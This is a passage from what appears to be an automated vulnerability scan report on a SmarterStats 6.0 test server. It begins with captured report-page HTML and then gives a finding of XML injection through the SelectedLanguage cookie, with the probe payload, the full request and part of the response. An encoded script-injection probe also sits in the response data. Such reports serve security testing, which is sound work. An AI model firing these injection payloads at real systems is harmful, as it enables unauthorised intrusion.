           <th id="ctl00_MPH_RadEndDate_calendar_Top_cs_0" title="Sunday" abbr="Sun" scope="col">S</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_1" title="Monday" abbr="Mon" scope="col">M</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_2" title="Tuesday" abbr="Tue" scope="col">T</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_3" title="Wednesday" abbr="Wed" scope="col">W</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_4" title="Thursday" abbr="Thu" scope="col">T</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_5" title="Friday" abbr="Fri" scope="col">F</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_6" title="Saturday" abbr="Sat" scope="col">S</th>
       </tr>
   </thead><tbody>
       <tr class="rcRow">
           <td class="rcOtherMonth" title="Sunday, September 26, 2010"><a href="#">26</a></td><td class="rcOtherMonth" title="Monday, September 27, 2010"><a href="#">27</a></td><td class="rcOtherMonth" title="Tuesday, September 28, 2010"><a href="#">28</a></td><td class="rcOtherMonth" title="Wednesday, September 29, 2010"><a href="#">29</a></td><td class="rcOtherMonth" title="Thursday, September 30, 2010"><a href="#">30</a></td><td title="Friday, October 01, 2010"><a href="#">1</a></td><td class="rcWeekend" title="Saturday, October 02, 2010"><a href="#">2</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 03, 2010"><a href="#">3</a></td><td title="Monday, October 04, 2010"><a href="#">4</a></td><td title="Tuesday, October 05, 2010"><a href="#">5</a></td><td title="Wednesday, October 06, 2010"><a href="#">6</a></td><td title="Thursday, October 07, 2010"><a href="#">7</a></td><td title="Friday, October 08, 2010"><a href="#">8</a></td><td class="rcWeekend" title="Saturday, October 09, 2010"><a href="#">9</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 10, 2010"><a href="#">10</a></td><td title="Monday, October 11, 2010"><a href="#">11</a></td><td title="Tuesday, October 12, 2010"><a href="#">12</a></td><td title="Wednesday, October 13, 2010"><a href="#">13</a></td><td title="Thursday, October 14, 2010"><a href="#">14</a></td><td title="Friday, October 15, 2010"><a href="#">15</a></td><td class="rcWeekend" title="Saturday, October 16, 2010"><a href="#">16</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 17, 2010"><a href="#">17</a></td><td title="Monday, October 18, 2010"><a href="#">18</a></td><td title="Tuesday, October 19, 2010"><a href="#">19</a></td><td title="Wednesday, October 20, 2010"><a href="#">20</a></td><td title="Thursday, October 21, 2010"><a href="#">21</a></td><td title="Friday, October 22, 2010"><a href="#">22</a></td><td class="rcWeekend" title="Saturday, October 23, 2010"><a href="#">23</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 24, 2010"><a href="#">24</a></td><td title="Monday, October 25, 2010"><a href="#">25</a></td><td title="Tuesday, October 26, 2010"><a href="#">26</a></td><td title="Wednesday, October 27, 2010"><a href="#">27</a></td><td title="Thursday, October 28, 2010"><a href="#">28</a></td><td title="Friday, October 29, 2010"><a href="#">29</a></td><td class="rcWeekend" title="Saturday, October 30, 2010"><a href="#">30</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 31, 2010"><a href="#">31</a></td><td class="rcOtherMonth" title="Monday, November 01, 2010"><a href="#">1</a></td><td class="rcOtherMonth" title="Tuesday, November 02, 2010"><a href="#">2</a></td><td class="rcOtherMonth" title="Wednesday, November 03, 2010"><a href="#">3</a></td><td class="rcOtherMonth" title="Thursday, November 04, 2010"><a href="#">4</a></td><td class="rcOtherMonth" title="Friday, November 05, 2010"><a href="#">5</a></td><td class="rcOtherMonth" title="Saturday, November 06, 2010"><a href="#">6</a></td>
       </tr>
   </tbody>
</table></td>
   </tr>
</tbody>
           </table><input type="hidden" name="ctl00_MPH_RadEndDate_calendar_SD" id="ctl00_MPH_RadEndDate_calendar_SD" value="[]" /><input type="hidden" name="ctl00_MPH_RadEndDate_calendar_AD" id="ctl00_MPH_RadEndDate_calendar_AD" value="[[1800,1,1],[2200,1,1],[2010,10,11]]" /></div></td>
       </tr>
   </table><input id="ctl00_MPH_RadEndDate_ClientState" name="ctl00_MPH_RadEndDate_ClientState" type="hidden" />
</div>
                       </td>
                   </tr>
               </table>
           </div>
           <div>
               <table cellspacing='0' class='ReportOptionSection'>
                   <tr>
                       
                       
                       
                       
                       
                       
                       
                       
                       
                       
                       
                       
                       <td class='GenerateReportButton'>
                           <div id="ctl00_MPH_btnGenerateReport" class="BBButton RefreshButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$MPH$btnGenerateReport',''); return false;"><span class="BBInner"></span></a></div>
                       </td>
                   </tr>
               </table>
           </div>
       </div>
       <div class='ReportOptionSection' style='display: none'>
           <div id="ctl00_MPH_UpdatePanel1">
   
                   <table cellspacing='0' class='ReportOptionSection'>
                       <tr>
                           <td class='ReportTitle'>
                               <span id="ctl00_MPH_lblReportTitle"></span>
                           </td>
                           <td class='ReportSubTitle'>
                               (<span id="ctl00_MPH_lblReportSubTitle"></span>)
                           </td>
                       </tr>
                   </table>
               
</div>
       </div>
   </div>
   <input type="hidden" name="ctl00$MPH$hfDMFilename" id="ctl00_MPH_hfDMFilename" />
   <input type="hidden" name="ctl00$MPH$hfDMReport" id="ctl00_MPH_hfDMReport" />
   <div id="ctl00_MPH_UP1">
   
           
           <a id="ctl00_MPH_lnkCancel" href="javascript:__doPostBack(&#39;ctl00$MPH$lnkCancel&#39;,&#39;&#39;)"></a>
       
</div>
   <input type="submit" name="ctl00$MPH$btnShowReport" value="Display Report" id="ctl00_MPH_btnShowReport" style="display: none" />

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
   Logs imported from 1/1/0001 to 12/31/9999

           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('client/frmviewreports', 'Standard\x5fWebmaster');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       
   <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=Specific/ProgressBar"></script>

   <script type="text/javascript">
       var loaded = false;
       function DoDataMine(file, report) {
           //location.href = '/Client/frmViewReports.aspx?reporttype=interactive&file=' + file + '&mine=' + report;
           parent.dmFilename = file;
           parent.dmQuery = report;
           parent.UpdateSection('UserDataMining', null, false, false); //filename
       }
       function AddFavoritePopup() {
           var url = "/Client/Popups/frmFavoriteReport.aspx";
           SpawnHyperWindow(url, 375, 320, null);
       }
       function AddFavoritePopup_Interactive() {
           var url = "/Client/Popups/frmFavoriteReport.aspx";
           SpawnHyperWindow(url, 500, 270, null);
       }
       function AddFavoritePopup_SEO() {
           var url = "/Client/Popups/frmFavoriteReport.aspx";
           SpawnHyperWindow(url, 375, 230, null);
       }
       function ExportReportPopup() {
           var url = "/Client/Popups/frmExportReport.aspx";
           window.name = "GenericWindow";
           SpawnHyperWindow(url, 400, 100, null);
       }
       function EmailReportPopup() {
           if (false)
           {
            var url = "/Client/Popups/frmEmailReport.aspx";
            window.name = "GenericWindow";
            SpawnHyperWindow(url, 450, 340, null);
           }
           else
           {
            ShowAlertWindow("In order to send reports through email, SMTP information must be entered into the Email Settings page by a site administrator.");
           }
       }
       function PrintReportPopup() {
           var url = "/Client/Popups/frmPrintPreview.aspx";
           parent.GenericPopup(url, "PrintPreview", "width=700,height=500,resizable=yes,scrollbars=yes,status=no");
       }
       function RadDataMine(filename, miningset, report) {
        SpawnHyperWindowWithElement(
        "/Client/Popups/frmDataMine.aspx?file=" + filename + "&miningset=" + miningset + "&report=" + report,
        400, 130, null, DoDataMine);
       }

       function GetProgressUpdate() {
           PageMethods.GetReportProgress(progressGuid, ProgressBarCallbackComplete, ProgressBarCallbackFailed);
       }
       function DoReportPostBack() {
           //
__doPostBack('ctl00$MPH$btnShowReport','');
       }
       function DoReportCancel() {
           //
__doPostBack('ctl00$MPH$lnkCancel','');;
       }
       function SiteUrlUndefined()
       {
           parent.ShowAlertWindow('The Site URL for this site has not been set. In order to view pages, define this value in the site general settings.');
       }
       var ProgressBarText = 'Processing';

   </script>


   

<script type="text/javascript">
//<![CDATA[
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fClient\x2ffrmViewReports\x2easpx?Custom\x3dFalse\x26ReportType\x3dStandard\x26subReportName\x3dWebmaster'); });
$(function() { SetTopTitle('View\x20Report'); });
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDateInput, {"_focused":false,"_originalValue":"10/5/2010 12:00:00 AM","_postBackEventReferenceScript":"__doPostBack(\u0027ctl00$MPH$RadStartDate\u0027,\u0027\u0027)","_skin":"SmarterTools","clientStateFieldID":"ctl00_MPH_RadStartDate_dateInput_ClientState","dateFormat":"M/d/yyyy","dateFormatInfo":{"DayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"MonthNames":["January","February","March","April","May","June","July","August","September","October","November","December",""],"AbbreviatedDayNames":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"AbbreviatedMonthNames":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"AMDesignator":"AM","PMDesignator":"PM","DateSeparator":"/","TimeSeparator":":","FirstDayOfWeek":0,"DateSlots":{"Month":0,"Year":2,"Day":1},"ShortYearCenturyEnd":2029,"TimeInputOnly":false},"displayDateFormat":"M/d/yyyy","enabled":true,"incrementSettings":{InterceptArrowKeys:true,InterceptMouseWheel:true,Step:1},"maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00","styles":{HoveredStyle: ["width:100%;", "riTextBox riHover"],InvalidStyle: ["width:100%;", "riTextBox riError"],DisabledStyle: ["width:100%;", "riTextBox riDisabled"],FocusedStyle: ["width:100%;", "riTextBox riFocused"],EmptyMessageStyle: ["width:100%;", "riTextBox riEmpty"],ReadOnlyStyle: ["width:100%;", "riTextBox riRead"],EnabledStyle: ["width:100%;", "riTextBox riEnabled"]}}, null, null, $get("ctl00_MPH_RadStartDate_dateInput"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadCalendar, {"_DayRenderChangedDays":{},"_FormatInfoArray":[["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],["January","February","March","April","May","June","July","August","September","October","November","December",""],["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"dddd, MMMM dd, yyyy h:mm:ss tt","dddd, MMMM dd, yyyy","h:mm:ss tt","MMMM dd","ddd, dd MMM yyyy HH\u0027:\u0027mm\u0027:\u0027ss \u0027GMT\u0027","M/d/yyyy","h:mm tt","yyyy\u0027-\u0027MM\u0027-\u0027dd\u0027T\u0027HH\u0027:\u0027mm\u0027:\u0027ss","yyyy\u0027-\u0027MM\u0027-\u0027dd HH\u0027:\u0027mm\u0027:\u0027ss\u0027Z\u0027","MMMM, yyyy","AM","PM","/",":",0],"_ViewRepeatableDays":{},"_ViewsHash":{"ctl00_MPH_RadStartDate_calendar_Top" : [[2010,10,1], 1]},"_calendarWeekRule":0,"_culture":"en-US","_enableKeyboardNavigation":false,"_enableViewSelector":false,"_firstDayOfWeek":7,"_postBackCall":"__doPostBack(\u0027ctl00$MPH$RadStartDate$calendar\u0027,\u0027@@\u0027)","clientStateFieldID":"ctl00_MPH_RadStartDate_calendar_ClientState","enableMultiSelect":false,"enabled":true,"monthYearNavigationSettings":["Today","OK","Cancel","Date is out of range.","False","True","300","1","300","1"],"skin":"SmarterTools","specialDaysArray":[],"stylesHash":{"DayStyle": ["", ""],"CalendarTableStyle": ["", "rcMainTable"],"OtherMonthDayStyle": ["", "rcOtherMonth"],"TitleStyle": ["", ""],"SelectedDayStyle": ["", "rcSelected"],"SelectorStyle": ["", ""],"DisabledDayStyle": ["", "rcDisabled"],"OutOfRangeDayStyle": ["", "rcOutOfRange"],"WeekendDayStyle": ["", "rcWeekend"],"DayOverStyle": ["", "rcHover"],"FastNavigationStyle": ["", "RadCalendarMonthView RadCalendarMonthView_SmarterTools"],"ViewSelectorStyle": ["", "rcViewSel"]},"useColumnHeadersAsSelectors":false,"useRowHeadersAsSelectors":false}, null, null, $get("ctl00_MPH_RadStartDate_calendar"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDatePicker, {"_PopupButtonSettings":{ ResolvedImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif", ResolvedHoverImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif"},"_animationSettings":{ShowAnimationDuration:300,ShowAnimationType:1,HideAnimationDuration:300,HideAnimationType:1},"_popupControlID":"ctl00_MPH_RadStartDate_popupButton","clientStateFieldID":"ctl00_MPH_RadStartDate_ClientState","focusedDate":"2010-10-11-00-00-00","maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00"}, null, {"calendar":"ctl00_MPH_RadStartDate_calendar","dateInput":"ctl00_MPH_RadStartDate_dateInput"}, $get("ctl00_MPH_RadStartDate"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDateInput, {"_focused":false,"_originalValue":"10/11/2010 12:00:00 AM","_postBackEventReferenceScript":"__doPostBack(\u0027ctl00$MPH$RadEndDate\u0027,\u0027\u0027)","_skin":"SmarterTools","clientStateFieldID":"ctl00_MPH_RadEndDate_dateInput_ClientState","dateFormat":"M/d/yyyy","dateFormatInfo":{"DayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"MonthNames":["January","February","March","April","May","June","July","August","September","October","November","December",""],"AbbreviatedDayNames":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"AbbreviatedMonthNames":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"AMDesignator":"AM","PMDesignator":"PM","DateSeparator":"/","TimeSeparator":":","FirstDayOfWeek":0,"DateSlots":{"Month":0,"Year":2,"Day":1},"ShortYearCenturyEnd":2029,"TimeInputOnly":false},"displayDateFormat":"M/d/yyyy","enabled":true,"incrementSettings":{InterceptArrowKeys:true,InterceptMouseWheel:true,Step:1},"maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00","styles":{HoveredStyle: ["width:100%;", "riTextBox riHover"],InvalidStyle: ["width:100%;", "riTextBox riError"],DisabledStyle: ["width:100%;", "riTextBox riDisabled"],FocusedStyle: ["width:100%;", "riTextBox riFocused"],EmptyMessageStyle: ["width:100%;", "riTextBox riEmpty"],ReadOnlyStyle: ["width:100%;", "riTextBox riRead"],EnabledStyle: ["width:100%;", "riTextBox riEnabled"]}}, null, null, $get("ctl00_MPH_RadEndDate_dateInput"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadCalendar, {"_DayRenderChangedDays":{},"_FormatInfoArray":[["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],["January","February","March","April","May","June","July","August","September","October","November","December",""],["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"dddd, MMMM dd, yyyy h:mm:ss tt","dddd, MMMM dd, yyyy","h:mm:ss tt","MMMM dd","ddd, dd MMM yyyy HH\u0027:\u0027mm\u0027:\u0027ss \u0027GMT\u0027","M/d/yyyy","h:mm tt","yyyy\u0027-\u0027MM\u0027-\u0027dd\u0027T\u0027HH\u0027:\u0027mm\u0027:\u0027ss","yyyy\u0027-\u0027MM\u0027-\u0027dd HH\u0027:\u0027mm\u0027:\u0027ss\u0027Z\u0027","MMMM, yyyy","AM","PM","/",":",0],"_ViewRepeatableDays":{},"_ViewsHash":{"ctl00_MPH_RadEndDate_calendar_Top" : [[2010,10,1], 1]},"_calendarWeekRule":0,"_culture":"en-US","_enableKeyboardNavigation":false,"_enableViewSelector":false,"_firstDayOfWeek":7,"_postBackCall":"__doPostBack(\u0027ctl00$MPH$RadEndDate$calendar\u0027,\u0027@@\u0027)","clientStateFieldID":"ctl00_MPH_RadEndDate_calendar_ClientState","enableMultiSelect":false,"enabled":true,"monthYearNavigationSettings":["Today","OK","Cancel","Date is out of range.","False","True","300","1","300","1"],"skin":"SmarterTools","specialDaysArray":[],"stylesHash":{"DayStyle": ["", ""],"CalendarTableStyle": ["", "rcMainTable"],"OtherMonthDayStyle": ["", "rcOtherMonth"],"TitleStyle": ["", ""],"SelectedDayStyle": ["", "rcSelected"],"SelectorStyle": ["", ""],"DisabledDayStyle": ["", "rcDisabled"],"OutOfRangeDayStyle": ["", "rcOutOfRange"],"WeekendDayStyle": ["", "rcWeekend"],"DayOverStyle": ["", "rcHover"],"FastNavigationStyle": ["", "RadCalendarMonthView RadCalendarMonthView_SmarterTools"],"ViewSelectorStyle": ["", "rcViewSel"]},"useColumnHeadersAsSelectors":false,"useRowHeadersAsSelectors":false}, null, null, $get("ctl00_MPH_RadEndDate_calendar"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDatePicker, {"_PopupButtonSettings":{ ResolvedImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif", ResolvedHoverImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif"},"_animationSettings":{ShowAnimationDuration:300,ShowAnimationType:1,HideAnimationDuration:300,HideAnimationType:1},"_popupControlID":"ctl00_MPH_RadEndDate_popupButton","clientStateFieldID":"ctl00_MPH_RadEndDate_ClientState","focusedDate":"2010-10-11-00-00-00","maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00"}, null, {"calendar":"ctl00_MPH_RadEndDate_calendar","dateInput":"ctl00_MPH_RadEndDate_dateInput"}, $get("ctl00_MPH_RadEndDate"));
});
//]]>
</script>
</form>
</body>
</html>


3.12. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx [SelectedLanguage cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Client/frmViewReports.aspx

Issue detail

The SelectedLanguage cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the SelectedLanguage cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=SiteUsage HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=rhBSoSZ3uKmx8z+qIBCGVhb6e6qOMott; SelectedLanguage=]]>>; STTTState=; STHashCookie={"CountsGuid":"1226267292","TopBarSection":"UserSpiders"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 01:04:21 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 44346



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   View Report - SmarterStats
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Reporting/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="" dir="ltr">
   <form name="aspnetForm" method="post" action="frmViewReports.aspx?Custom=False&amp;ReportType=Standard&amp;subReportName=SiteUsage" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTIyNzU0MjE4NQ8WBB4QX19fUmVzdWx0RmFpbHVyZQWZBEltcG9ydCBFcnJvcjogMTAvMTEvMjAxMCA4OjAyIFBNIC0gRVJST1I6IENvdWxkIG5vdCBzYXZlIFNpdGVIaXN0b3J5IGZpbGUgQzpcJiN4MDAyMjsmI3gwMDJEOyYjeDAwMkQ7JiN4MDAzRTsmI3gwMDNDOyYjeDAwNzM7JiN4MDA2MzsmI3gwMDcyOyYjeDAwNjk7JiN4MDA3MDsmI3gwMDc0OyYjeDAwM0U7JiN4MDA2MTsmI3gwMDZDOyYjeDAwNjU7JiN4MDA3MjsmI3gwMDc0OyYjeDAwMjg7JiN4MDAzMDsmI3gwMDc4OyYjeDAwMzA7JiN4MDAzMDsmI3gwMDMwOyYjeDAwMzc7JiN4MDA0NjsmI3gwMDM3OyYjeDAwMjk7JiN4MDAzQzsmI3gwMDJGOyYjeDAwNzM7JiN4MDA2MzsmI3gwMDcyOyYjeDAwNjk7JiN4MDA3MDsmI3gwMDc0O1xXZWJMb2dzXDFcU2l0ZUNvbmZpZy54bWwubmV3My4gIEFzIGEgcHJlY2F1dGlvbiwgdGhpcyBzZXJ2ZXIgaGFzIGJlZW4gcGF1c2VkLiAgQSByZWJvb3QgbWF5IGJlIHRoZSBiZXN0IHdheSB0byBzb2x2ZSBhbnkgZmlsZSBsb2NraW5nIHByb2JsZW1zIHRoYXQgbWF5IGJlIHByZXNlbnQuPGJyPjxicj48YnI+PGJyPh4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYMAgMPZBYCAgEPZBYCAgEPZBYCZg9kFggCAQ8PFgIeB1Zpc2libGVoZGQCAw8PFgIeF0NsaWVudFNpZGVTY3JpcHRPbkNsaWNrBRJFbWFpbFJlcG9ydFBvcHVwKClkZAIFDw8WAh8DBRNFeHBvcnRSZXBvcnRQb3B1cCgpZGQCBw8PFgIfAwUSUHJpbnRSZXBvcnRQb3B1cCgpZGQCBA8WBB4Fc3R5bGUFDWRpc3BsYXk6bm9uZTsfAmhkAgYPFgIfAmhkAgcPZBYCZg9kFgICAQ9kFgICAQ8WAh4EVGV4dAW7BDxkaXYgY2xhc3M9IlRpcFRleHRGYWlsdXJlIj5JbXBvcnQgRXJyb3I6IDEwLzExLzIwMTAgODowMiBQTSAtIEVSUk9SOiBDb3VsZCBub3Qgc2F2ZSBTaXRlSGlzdG9yeSBmaWxlIEM6XCYjeDAwMjI7JiN4MDAyRDsmI3gwMDJEOyYjeDAwM0U7JiN4MDAzQzsmI3gwMDczOyYjeDAwNjM7JiN4MDA3MjsmI3gwMDY5OyYjeDAwNzA7JiN4MDA3NDsmI3gwMDNFOyYjeDAwNjE7JiN4MDA2QzsmI3gwMDY1OyYjeDAwNzI7JiN4MDA3NDsmI3gwMDI4OyYjeDAwMzA7JiN4MDA3ODsmI3gwMDMwOyYjeDAwMzA7JiN4MDAzMDsmI3gwMDM3OyYjeDAwNDY7JiN4MDAzNzsmI3gwMDI5OyYjeDAwM0M7JiN4MDAyRjsmI3gwMDczOyYjeDAwNjM7JiN4MDA3MjsmI3gwMDY5OyYjeDAwNzA7JiN4MDA3NDtcV2ViTG9nc1wxXFNpdGVDb25maWcueG1sLm5ldzMuICBBcyBhIHByZWNhdXRpb24sIHRoaXMgc2VydmVyIGhhcyBiZWVuIHBhdXNlZC4gIEEgcmVib290IG1heSBiZSB0aGUgYmVzdCB3YXkgdG8gc29sdmUgYW55IGZpbGUgbG9ja2luZyBwcm9ibGVtcyB0aGF0IG1heSBiZSBwcmVzZW50Ljxicj48YnI+PGJyPjxicj48L2Rpdj5kAggPFgIfAmhkAgkPZBYCAgEPZBYeAgMPDxYQHgxTZWxlY3RlZERhdGUGAMBRYzcyzQgeB01pbkRhdGUGAEDK+KPo4AceB01heERhdGUGAABowSlcoQkeHEVuYWJsZUVtYmVkZGVkQmFzZVN0eWxlc2hlZXRoHhNFbmFibGVFbWJlZGRlZFNraW5zaB4EU2tpbgUMU21hcnRlclRvb2xzHghDc3NDbGFzcwUSRGF0ZVBpY2tlck92ZXJyaWRlHgRfIVNCAgJkFgZmDxQrAAgPFhIfCmgfCwUMU21hcnRlclRvb2xzHwgGAABowSlcoQkeDU9yaWdpbmFsVmFsdWUFFTEwLzUvMjAxMCAxMjowMDowMCBBTR8FBRMyMDEwLTEwLTA1LTAwLTAwLTAwHg1MYWJlbENzc0NsYXNzBQdyaUxhYmVsHhdFbmFibGVBamF4U2tpblJlbmRlcmluZ2gfCWgfBwYAQMr4o+jgB2QWBh4FV2lkdGgbAAAAAAAAWUAHAAAAHwwFEXJpVGV4dEJveCByaUhvdmVyHw0CggIWBh8RGwAAAAAAAFlABwAAAB8MBRFyaVRleHRCb3ggcmlFcnJvch8NAoICFgYfERsAAAAAAABZQAcAAAAfDAUTcmlUZXh0Qm94IHJpRm9jdXNlZB8NAoICFgYfERsAAAAAAABZQAcAAAAfDAUTcmlUZXh0Qm94IHJpRW5hYmxlZB8NAoICFgYfERsAAAAAAABZQAcAAAAfDAUUcmlUZXh0Qm94IHJpRGlzYWJsZWQfDQKCAhYGHxEbAAAAAAAAWUAHAAAAHwwFEXJpVGV4dEJveCByaUVtcHR5Hw0CggIWBh8RGwAAAAAAAFlABwAAAB8MBRByaVRleHRCb3ggcmlSZWFkHw0CggJkAgEPDxYEHghJbWFnZVVybAUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYeDUhvdmVySW1hZ2VVcmwFMi9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzLzE2eDE2L0NhbGVuZGFyTW9udGguZ2lmFgIeB29uY2xpY2sFPHJldHVybiBDYWxlbmRhclBvcHVwKCRmaW5kKCdjdGwwMF9NUEhfUmFkU3RhcnREYXRlJyksJ2NhbCcpO2QCAg8UKwANDxYaBQ9SZW5kZXJJbnZpc2libGVnBRFFbmFibGVNdWx0aVNlbGVjdGgFFkZhc3ROYXZpZ2F0aW9uUHJldlRleHRlBRFWaWV3U2VsZWN0b3JJbWFnZQUqL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvbWlzYy9yaWdodDIuZ2lmBQRNaW5EBgBAyvij6OAHBQ1TZWxlY3RlZERhdGVzDwWPAVRlbGVyaWsuV2ViLlVJLkNhbGVuZGFyLkNvbGxlY3Rpb25zLkRhdGVUaW1lQ29sbGVjdGlvbiwgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy40MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FCsAAAUOUm93SGVhZGVySW1hZ2UFKS9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzL21pc2MvcmlnaHQuZ2lmBRJOYXZpZ2F0aW9uTmV4dFRleHRlBQNFUlNoBRJOYXZpZ2F0aW9uUHJldlRleHRlBQtTcGVjaWFsRGF5cw8FkgFUZWxlcmlrLldlYi5VSS5DYWxlbmRhci5Db2xsZWN0aW9ucy5DYWxlbmRhckRheUNvbGxlY3Rpb24sIFRlbGVyaWsuV2ViLlVJLCBWZXJzaW9uPTIwMTAuMi44MTcuNDAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MTIxZmFlNzgxNjViYTNkNBQrAAAFFkZhc3ROYXZpZ2F0aW9uTmV4dFRleHRlBQRNYXhEBgAAaMEpXKEJDxYIHwsFDFNtYXJ0ZXJUb29scx8KaB8JaB8QaGRkFgQfDAULcmNNYWluVGFibGUfDQICFgQfDAUMcmNPdGhlck1vbnRoHw0CAmQWBB8MBQpyY1NlbGVjdGVkHw0CAmQWBB8MBQpyY0Rpc2FibGVkHw0CAhYEHwwFDHJjT3V0T2ZSYW5nZR8NAgIWBB8MBQlyY1dlZWtlbmQfDQICFgQfDAUHcmNIb3Zlch8NAgIWBB8MBTZSYWRDYWxlbmRhck1vbnRoVmlldyBSYWRDYWxlbmRhck1vbnRoVmlld19TbWFydGVyVG9vbHMfDQICFgQfDAUJcmNWaWV3U2VsHw0CAmQCBw8PF